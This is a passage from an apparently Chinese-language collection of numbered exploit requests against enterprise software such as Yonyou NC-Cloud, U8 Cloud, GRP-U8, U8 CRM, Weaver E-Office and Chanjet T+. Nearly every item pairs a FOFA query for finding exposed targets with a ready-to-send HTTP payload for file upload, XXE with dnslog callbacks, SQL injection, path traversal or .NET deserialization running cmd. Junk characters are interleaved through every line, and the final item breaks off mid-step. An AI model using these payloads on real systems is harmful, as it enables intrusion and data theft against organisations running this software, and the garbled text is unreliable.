2 s' w) f0 O0 r7 Y% i0 g" i' z3 Y
, d3 f0 E$ _  f5 W" V35. 用友NC-Cloud importhttpscer任意文件上传
  x. x+ X' O+ L5 dFOFA:app="用友-NC-Cloud"; h4 d4 S7 t: f7 Q! p
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1, k+ S( ]4 H! I' ]7 B
Host: 203.25.218.166:88887 m9 w2 n+ g0 ?6 r3 G2 l5 |
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
# o# m6 e1 o1 Q# p0 ?2 j5 x; zAccept-Encoding: gzip, deflate
! p; n; y; a5 ]9 x0 o0 _Accept: */*
: o* m7 g( I( i  bConnection: close
0 w# t6 }/ ]  d( C2 U. UaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
) B! ^7 Q# \4 MContent-Length: 190/ {& W" l5 u! |4 ]
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
( }+ [7 C+ F: Z' j, i# e+ M, \2 _; n) Q) z& L/ @8 m& }
--fd28cb44e829ed1c197ec3bc71748df0  o. L/ {' K. {3 r+ D
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp", z, z* z5 `4 u9 |
% s; Q' Z& Q0 m/ I
<%out.println(1111*1111);%>
! s8 f5 L: H, u5 C7 K* Q* l--fd28cb44e829ed1c197ec3bc71748df0--
# y0 F. b/ w6 T3 I5 ~8 Q2 `
0 R/ r( ~3 Z  V! C% h, L9 F; q2 w7 J; H& M8 |9 c
36. 用友NC-Cloud soapFormat XXE
/ r' L, E/ o! U$ ?- XFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"/ ?! q: _; ^/ u" e4 [
POST /uapws/soapFormat.ajax HTTP/1.1
7 F. o' q" L  [( L3 k5 Y1 ]* KHost: 192.168.40.130:8989
1 ]2 u% y( ]% y, BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
, _; z2 n+ J1 N6 oContent-Length: 263
+ [; e+ z0 F$ KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' @2 [/ Y+ `$ u' A6 x
Accept-Encoding: gzip, deflate: T+ C" R3 `( @* k$ w6 h; V4 u( W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, o1 O8 Q  u0 |; l, n
Connection: close
: b* c( |: }/ H! ^/ K4 x, ]Content-Type: application/x-www-form-urlencoded' b* U8 q  _6 b3 h
Upgrade-Insecure-Requests: 1
7 C% [3 F7 X( Y" ]8 r% d
) X; \2 f% l0 `0 {5 i3 ]msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
8 o. l: S( J+ E8 K! T* K( M  d5 X; l! E5 K1 ^
0 [" ?% ^! F# r8 O
37. 用友NC-Cloud IUpdateService XXE
' E5 Z. G5 K2 D: ], `FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
8 L, A9 z9 K/ U+ e0 J* [POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.17 @+ d  f/ U* w) l" ]# G% ^6 r, ]  x  I
Host: 192.168.40.130:8989& R+ W) a; z1 I4 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36- C3 f. q. e# Y. _: `2 D9 G% p
Content-Length: 421
3 |6 A5 q: n- n8 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9, ?5 ~' @2 ?; d; t& ]
Accept-Encoding: gzip, deflate8 Z4 C% Q. u9 h- ?$ @- d: |. R
Accept-Language: zh-CN,zh;q=0.9/ V, Y0 O9 d4 l. \
Connection: close, j1 u/ K+ n) ?% @4 f- S6 g
Content-Type: text/xml;charset=UTF-8
9 B" U0 R& u* S; vSOAPAction: urn:getResult
, @- I" N  L0 n* r/ O4 gUpgrade-Insecure-Requests: 12 z  R& F1 @4 U6 W: `% v

; {& i) L$ p& i' Y6 J) M7 O# ^<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">6 V0 j& o' ?; X, j5 e
<soapenv:Header/>: Y' S: K0 Y1 \4 O$ z# H( `
<soapenv:Body>) [) m- I7 t! g1 u/ p
<iup:getResult>/ c# T! w# ^$ ?" c( ?
<!--type: string-->
4 X+ V* X* P; z+ ^: w; y6 g2 M/ z7 K<iup:string><![CDATA[
& r0 H& O2 w; q<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
6 o8 f; }, z+ X& h0 b; N<xxx/>]]></iup:string>7 a+ a1 m- w0 N/ U8 N
</iup:getResult>8 \; \/ a2 p8 S! y
</soapenv:Body>
) F9 ^/ t; I% K/ E: o</soapenv:Envelope>* T1 i( x0 ^% Y( ?
6 e0 \9 q% {* `! S, k! e, Y

8 Q2 W' C- S6 z, F: r2 }2 v7 v# T. X0 @/ ~$ {
38. 用友U8 Cloud smartweb2.RPC.d XXE
6 ^( s$ i; g' g7 L/ D' L/ @) b# LFOFA:app="用友-U8-Cloud": x' {% N7 w8 ?: T. E: g; w, ~* |
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
. f9 @2 Q! ]) A* ~6 [& X0 `: _Host: 192.168.40.131:80885 a0 m3 ^* K: ]  }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25: l& z8 A, X' k' e5 m
Content-Length: 260
  D/ H* l. [8 w$ z  ?0 S/ JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b30 G0 D2 s2 V6 {# T$ e
Accept-Encoding: gzip, deflate6 i1 l( P/ i3 V( I
Accept-Language: zh-CN,zh;q=0.9
6 T5 G1 `, g5 o+ @; lConnection: close
# Y' \' v0 v- R. m/ DContent-Type: application/x-www-form-urlencoded+ g0 ]( U6 j# z4 G: T* I

9 F; N* c) Y  }3 n__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
# V! P+ j* C' I& D  s0 n+ J8 \: `7 t" g5 L7 a+ L4 W

9 Z9 x1 R9 a2 B, c1 d39. 用友U8 Cloud RegisterServlet SQL注入$ |; D* S( `1 K7 ^' N9 z8 l
FOFA:title="u8c"
7 m% L9 o2 g1 ]+ j# |4 y5 f6 VPOST /servlet/RegisterServlet HTTP/1.18 s8 \& l; D8 [
Host: 192.168.86.128:8089
$ ^1 \. K7 R% _) i, p6 A4 E. u  y! |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
( r8 H# n+ N* z6 l4 h' q( IConnection: close
: f" l" y8 R8 u8 U! d. {* Z; qContent-Length: 85
% m" v2 s+ a# J. L4 s5 mAccept: */*) e: }0 N' y0 z5 f) O
Accept-Language: en6 P5 c( S: P, m, F2 e) y
Content-Type: application/x-www-form-urlencoded
" l& N4 q7 r0 BX-Forwarded-For: 127.0.0.1+ A( G1 c5 W3 p! t
Accept-Encoding: gzip
  \' _" _1 |5 E- a
- A# e1 L. j5 K. y( w8 _usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
7 C6 T6 ^; `, L0 U* B9 k( c* M$ V; R5 @- z9 A% W$ V/ I5 {6 }, C. {
- S" f; s2 Z' q- ?
40. 用友U8-Cloud XChangeServlet XXE
$ \2 G# d/ p% j: LFOFA:app="用友-U8-Cloud"
: n+ Q; }6 O) g/ E5 X' a. ^POST /service/XChangeServlet HTTP/1.1
( Z: \9 a9 d1 F  Y% ?% o- {9 CHost: x.x.x.x
) c0 I' ?" j* b) s0 S, Y# NUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( C' S/ l. o) I4 @& s3 r6 w, U. tContent-Type: text/xml
1 z5 X" P( z+ I( Z3 e' O& NConnection: close
, E! I4 z/ n  q: }5 k+ ^+ l4 u; v4 B9 G0 x9 D9 a7 e6 ?
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>7 |) h3 b0 k6 M
) h  ]/ r  R2 d  w' ^3 m

. G+ N1 R1 ~$ N41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
# H: J5 u  S4 ?+ |4 Q* q  J3 G( {FOFA:app="用友-U8-Cloud". z/ y# }+ G+ k( ]  B
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
+ M) l. ^/ a8 D( z7 h# K6 THost:
/ L0 k, p9 y0 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& K( m0 Z! k& ~, F
Content-Type: application/json
9 C1 }* T+ e2 u6 DAccept-Encoding: gzip
% g1 ]3 Z1 k+ G% G* l0 Y8 oConnection: close
( Q2 H& W9 p5 h0 r
! n# b8 ^0 z1 {1 E& B: k- T- S5 }, J: s: ~9 }2 X) t
42. 用友GRP-U8 SmartUpload01 文件上传
7 h+ }( O) a9 L+ Y6 J2 O: D$ l; S4 AFOFA:app="用友-GRP-U8". F" m% Z1 f4 K9 C8 k
POST /u8qx/SmartUpload01.jsp HTTP/1.1+ t6 X6 c6 I3 l& a
Host: x.x.x.x
  v+ a9 h) ^3 ^7 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
. S% Q6 S4 }- M. LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
: |* V% C' w! s" O* U; {; G3 r) Y; @& [, O6 E' M7 o
PAYLOAD  l. o4 k3 R7 U$ j4 y6 {
5 R0 V* @0 L; ~% H7 |2 p
6 d) E' i  h! ^: l
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml7 @! _% _2 G$ F. C7 q
$ I  w& b0 \. O, F& s( t  d& ^
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
! T' Y# E8 r( o4 {7 |% ]& q6 tFOFA:app="用友-GRP-U8"+ q( h# z3 \7 n* D( _
POST /services/userInfoWeb HTTP/1.11 {# l' p" t. `% t6 k
Host: your-ip
4 \8 ~) T& f/ A- S3 o9 ?, aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; k0 L+ I% ]( }  S+ i; v% DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 t& T! c1 S" x; j- z9 m  S* \
Accept-Encoding: gzip, deflate
  D* X6 \/ s% e9 x; Q# S2 m! Z- MAccept-Language: zh-CN,zh;q=0.9# D$ d9 ]1 Q" h' W5 s6 X1 H/ |
Connection: close
2 ?& s/ F  z* `7 c2 P8 P& s7 }8 mSOAPAction:" S4 @1 }. `+ k% m# n8 Z1 j1 I  m
Content-Type: text/xml;charset=UTF-8
; v" _! R# s. z5 d5 F' V9 g: m* {' p6 I& K+ [4 @. S8 v; e
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
2 n. Q5 Y* t" a: I4 b) ]2 Y   <soapenv:Header/>/ @5 u, n% I. }# e3 X5 c
   <soapenv:Body># V1 U: n+ ?( X5 y/ \
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
2 P3 x2 t  M8 l3 ?         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
( N5 X! z8 S  s  ?      </ser:getUserNameById>
4 b; c2 h. W- |% W+ T   </soapenv:Body>
( T9 g* u( d. M! y% ^3 g</soapenv:Envelope>
1 V* Z& T9 u: V( \* q
; |. D& T7 {: N/ }
, @7 L+ v$ B1 W( n1 i$ h' t44. 用友GRP-U8 bx_dj_check.jsp SQL注入
9 h, D& E/ j3 D/ y  bFOFA:app="用友-GRP-U8"4 p3 _7 S8 V  r) R# ^6 @
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
/ N2 _. D" k$ V' d6 MHost: your-ip
4 t/ p7 [' b$ IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
; N0 [% _0 W# v) KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# I) r& x3 n6 P* L
Accept-Encoding: gzip, deflate% O4 l& L: q" Q' J! E: |4 |
Accept-Language: zh-CN,zh;q=0.9; R+ S& \) u  j$ Y# y
Connection: close: U2 @- L2 S2 F" q- X% p9 ~& n
! |8 _  N& J" y( t( ~
6 M: r' i" E, M6 I; p) E8 v
45. 用友GRP-U8 ufgovbank XXE
$ }# n, L6 [6 t& t& x/ EFOFA:app="用友-GRP-U8"# q/ t# u4 V& f2 f- ^4 U
POST /ufgovbank HTTP/1.1
; o1 R* Q( U8 W6 O- D) J9 E4 fHost: 192.168.40.130:2220 E" K- g# r+ ]3 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
9 J1 L0 h% Z& U  X- Y4 ?' cConnection: close
9 H- T! r. X% w# @. ~* @/ l. f( VContent-Length: 161
, ^, u2 y! F8 r. _3 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. \# [7 c  n& r1 D) k6 _# c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 z+ f: f5 I$ h  d" h, u7 Q$ b# uContent-Type: application/x-www-form-urlencoded
5 X! B2 w& P+ l/ ^( FAccept-Encoding: gzip
6 g; S' F! h. \# D# m5 d, D
& y( l0 d: M$ U, `8 F0 X3 b8 E; VreqData=<?xml version="1.0"?>
- M6 }7 H" P; t<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
4 ?/ d, C) V& C% K! M. Q+ r8 }! {
; |3 `7 e, J) |: c1 E
* h7 b. W9 u( f1 L" |" y( O46. 用友GRP-U8 sqcxIndex.jsp SQL注入6 Z8 T6 Y0 a4 g2 N! j+ d
FOFA:app="用友-GRP-U8"& u" G' w' Q- d8 ^) K) u0 t
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.11 {# G( \7 e( \1 x0 w- {  ]
Host: your-ip
# ]6 B9 P7 e8 l3 E$ kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.366 i! Y+ W9 \- {" }# y# z* f2 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# y" G+ K/ Z; a) R7 n
Accept-Encoding: gzip, deflate: p3 {3 _7 n' h3 s' N& u3 ]' d6 I
Accept-Language: zh-CN,zh;q=0.9- o# P, ~  P6 O' v% q, G- Z1 X7 C
Connection: close
1 i# l6 B) ^0 `7 c
6 v  D/ ~- l. ~, z# A1 C. z( R) G; R( P1 `/ ]) L1 s( m
47. 用友GRP A++Cloud 政府财务云 任意文件读取
- F& G0 Y6 s! t# aFOFA:body="/pf/portal/login/css/fonts/style.css"6 y# Y* N7 l8 n! j, U
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1; \8 r  p9 S  r: R2 k" q
Host: x.x.x.x) D5 A2 N6 X) @7 q( K; f2 g: e0 W
Cache-Control: max-age=07 e) g3 {" H: s8 q+ r$ ?  z
Upgrade-Insecure-Requests: 1
2 d* C9 R- J. {: J9 C' C2 {. r1 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: e( i7 p% n3 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 G: k7 d, A! Q" K" l0 d
Accept-Encoding: gzip, deflate, br
& I5 z6 z3 G9 T; Z$ I9 E" |; ~Accept-Language: zh-CN,zh;q=0.9
. u: Y4 D" Z; `; T& x6 y; i! |If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT& }0 A& ]9 E+ S5 x# s- Y5 R
Connection: close
: J- U! X4 [  b' Y0 T' J. h# K5 ]0 R+ P6 G. ?; j/ D

7 ?0 m7 Q+ T8 _; _8 g7 H" _# R* m% ~. j4 J% x: B
48. 用友U8 CRM swfupload 任意文件上传' Y% v. g  \" A$ c2 x
FOFA:title="用友U8CRM"
2 b! J& t3 s0 T, K- b' GPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
! A, X2 }& O4 i$ u' P: DHost: your-ip
3 I! ^5 K& `% s0 M1 E0 _. A( rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- S6 \( |0 O$ n7 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 U2 h$ t# B& s. F# u: h1 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" R2 I- S9 \. V( d# c3 V5 xAccept-Encoding: gzip, deflate1 N9 z5 F& p0 O( A# q5 S. ^
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
0 A. [$ D: _* a2 `1 Q------269520967239406871642430066855* V; x8 o1 W) A  k9 g" ?7 \
Content-Disposition: form-data; name="file"; filename="s.php"
( b/ a; Y2 x5 H, u, u/ A" @3 H12312 V6 t! W' r: W- z) u
Content-Type: application/octet-stream
9 X, N$ d% O, D, u) H------269520967239406871642430066855
$ e7 @' u& v8 ~, BContent-Disposition: form-data; name="upload"5 u0 A7 l4 N, _3 l
upload
3 z3 \1 A$ U- k2 a------269520967239406871642430066855--. f8 K# ^2 _  n9 K, c1 }

/ V5 n: \" \3 ]- X( Y; g# S+ e8 u, g. n6 u' X( m7 A5 U
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
2 B: F0 c7 E7 K" S" FFOFA:body="用友U8CRM"
7 i' \( e! G9 d/ `( c5 m, z( P+ Q: ?5 b6 w& w( Q
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1- X! t4 y$ i; e' E# F3 c; _7 W9 c
Host: x.x.x.x
$ I- x+ v: Q0 o2 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( p( v( H1 `8 y( sContent-Length: 329
' B" }2 K: s" J9 M9 W5 j& [- l/ BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: t- ~9 e% y8 ?- K' |* _. c
Accept-Encoding: gzip, deflate" \7 v: Y: E+ {; O7 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; m  k# \. r6 Q# z9 K& rConnection: close3 }; U' E3 _% D4 ^" x
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w4 h% y& s. B0 ^8 A$ t1 Z

0 D, p! h2 s# O0 A2 p) I4 j-----------------------------vvv3wdayqv3yppdxvn3w
) i1 g9 R( ~% G: C* `- o3 vContent-Disposition: form-data; name="file"; filename="%s.php "
0 B5 \  P$ J2 u# R# m0 TContent-Type: application/octet-stream& e" b6 e+ o- T! X5 f

' t" W& k6 n) T/ a3 D) v* y" ]' Owersqqmlumloqa
# v2 n; Y- C( h4 a; ]-----------------------------vvv3wdayqv3yppdxvn3w
/ c, B5 B7 `2 {4 ]Content-Disposition: form-data; name="upload"
, x+ O/ O& f) H) ?; o8 G
+ O% m/ `& y9 g5 B7 b: d: wupload2 C2 i: A5 S' X! \; j1 L' D
-----------------------------vvv3wdayqv3yppdxvn3w--
& ^" d1 q6 a6 h; a/ d# s" S9 f& P9 I. v, w& b; Q* s- R
0 ]1 c# |& z0 k1 S4 s
http://x.x.x.x/tmpfile/updB3CB.tmp.php4 {7 [1 H- s6 _$ o0 O' S; C' M0 ~

; ]! J( Q  y# i50. QDocs Smart School 6.4.1 filterRecords SQL注入; t& I, i* |0 L4 R4 p
FOFA:body="close closebtnmodal"
# n+ D" p, ^# }; GPOST /course/filterRecords/ HTTP/1.1
, k0 I5 W; J( e2 [1 x. g* D& |Host: x.x.x.x7 C5 V( |: F! {0 x$ t/ |/ t$ b
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: ]3 I; M: ?7 e/ j) y
Connection: close
3 I. E  e# z3 T! M: iContent-Length: 224
' {% i: T- c/ KAccept: */*
& ]2 {  s2 @8 m/ ^- iAccept-Language: en; {0 M0 n% _6 L
Content-Type: application/x-www-form-urlencoded3 y" v4 y/ Y0 y2 d9 `# a) L
Accept-Encoding: gzip! }8 S. i' ~* I' |% Y

) b) E* X" @3 b) v' k0 J" bsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
- R( y7 w. {9 [& u' c9 X  s0 u& s5 u- ~: a* o( Y

3 R3 `6 u3 n& ~5 c; w7 X51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入. e, o/ z( l% z& _( g3 W) w
FOFA:app="云时空社会化商业ERP系统", M' |7 o1 |& X- I7 r
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1+ r0 T9 O+ I8 p
Host: your-ip1 r9 O; m& t" x# x' Q) w
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.369 z) d$ u' O# v$ Y6 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  w6 u7 ]+ q( c0 ^2 g& I7 fAccept-Encoding: gzip, deflate: ?: f& ]+ {  w$ z4 U* ~) T+ F3 J' F
Accept-Language: zh-CN,zh;q=0.9' L* T+ N; z9 G- R0 X. @; f3 B
Connection: close7 g( |2 A4 K! b& z9 g" q! E

$ n; I* e1 G- i" ]5 S+ O0 u" X9 D5 ?) z& v% @+ D, n3 X
52. 泛微E-Office json_common.php sql注入
" {( W4 W+ L. m0 J: Z+ wFOFA:app="泛微-EOffice"3 K! T4 \$ v8 J' n- K0 @8 G
POST /building/json_common.php HTTP/1.1
8 m* L5 |& I& Z  U2 S2 YHost: 192.168.86.128:8097
" _! A& w  q5 d$ @- x! S2 aUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' @5 q. f, `5 w  O: z9 `Connection: close2 `1 C+ e- d% `/ q
Content-Length: 87
# o4 k1 p) n; V" zAccept: */*- }$ Q' f; f6 ?) H% ~1 c
Accept-Language: en; y6 |8 o! @3 m3 W6 B' ^
Content-Type: application/x-www-form-urlencoded
# R$ _& z1 _! U. o, @/ a4 p7 z$ AAccept-Encoding: gzip1 G  f6 B8 i& ~

) \; W) C& y7 ltfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
1 G, o% H9 s& F1 a5 S1 L1 O6 b2 \3 ^  [( K9 J0 Q: d0 n
3 w7 |: F; `* r+ H2 w# x# H: ?
53. 迪普 DPTech VPN Service 任意文件上传5 |& {. O3 s# S3 Z$ H7 e
FOFA:app="DPtech-SSLVPN"
) Q! L5 g# t3 R" F- g* F/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd% [) @) R0 h0 N- f  X
( O4 f4 ], |& U( @
) c3 P3 I/ m9 `, m) g
54. 畅捷通T+ getstorewarehousebystore 远程代码执行5 p2 C4 b( d! V0 J
FOFA:app="畅捷通-TPlus"/ D6 ~2 [( T. @; T! C  T
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件2 I9 [6 K* z, r! f# V! l
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
  W$ m' k3 }( d1 W' Y! e3 P+ ]3 [
6 p* ]5 g# u5 X& p( b9 \* a; }2 ^4 a: i* z6 A: Z- l9 s
完整数据包3 T- d9 Y! k; l( G- ]1 U, z$ G. V
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.19 m" m3 @$ W+ y9 ^- J
Host: x.x.x.x$ y" C3 ]9 L! A. u5 B: f# S$ K
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F) k$ I8 d  m' N0 D* j. l+ T
Content-Length: 5939 z! z, O+ t7 g4 @9 y" i
# E) E" V5 {# ~& G. Z* R
{2 j+ Z. u+ ^( q- C5 O; C- p
"storeID":{; ~/ y; n* l" ]4 a
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",  i: [1 o% e" {0 h7 G) A' s
"MethodName":"Start",
; A7 T3 P% S$ B7 @/ l* X  "ObjectInstance":{3 R* [0 [% E8 d+ ]' |
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- G/ x" x0 ?+ _/ [    "StartInfo":{
# r; e  u0 i% ]: L9 |& ^   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ _! j7 x) l0 w+ L- k$ \( c
    "FileName":"cmd",# t: X9 f6 U# F/ x# y# j
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% T0 f  @8 v; t4 F  r3 O3 V" l/ C! Y
    }
* D& w! k) v# [3 j3 K) Z2 `  }( O% ]2 N. L* X$ J6 }3 F9 q
  }8 Y, {) Y9 B) a  r" r6 n" K0 f
}. _6 {& y/ x/ k! k% Z# L
* \9 K3 J! U1 ]5 n1 C2 n

# V  ^: l! R( }( y# B第二步,访问如下url: Q  S/ K2 u. [
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
- \! c6 o: V1 H6 H0 b- S
/ w0 i  W; W* {- A+ L1 [; B
7 D4 S3 n! }2 C" ?2 E( E55. 畅捷通T+ getdecallusers信息泄露) Q* v3 H6 ?5 q
FOFA:app="畅捷通-TPlus"
& N9 c8 ]& L1 R7 l第一步,通过
. E9 T& {" F  o2 X/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
6 K" {% V2 s* H+ w第二步,利用获取到的Cookie请求9 c" R% C7 l0 z5 u2 C& q
